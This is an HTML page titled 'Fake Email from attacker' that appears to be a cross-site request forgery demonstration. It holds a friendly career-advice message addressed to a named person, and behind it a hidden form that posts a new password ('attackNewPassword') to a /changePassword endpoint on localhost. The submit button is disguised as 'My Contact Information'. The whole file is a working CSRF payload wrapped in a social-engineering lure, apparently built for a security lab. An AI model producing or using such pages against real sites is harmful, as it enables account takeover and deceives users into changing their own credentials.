<!DOCTYPE html>
<html lang="en" xmlns:th="https://www.thymeleaf.org">
<head>
  <meta charset="UTF-8">
  <title>Fake Email from attacker</title>
</head>
<body>
    <h1>Can I get your feedback on career advice?</h1>
    <form method="post" action="http://localhost:8085/changePassword">
        <p>
            Hey Mehmet Ozan Guven,
            I hope you're doing well! I'm reaching out because I'm thinking of making a career change and would love to get your advice.
            I admire you and all you've accomplished. I would be eager to have your input.

            Free for coffee sometime this week?
        </p>
        <input type="hidden" name="newPassword" value="attackNewPassword"/>
        <button type="submit">My Contact Information</button>
    </form>
</body>
</html>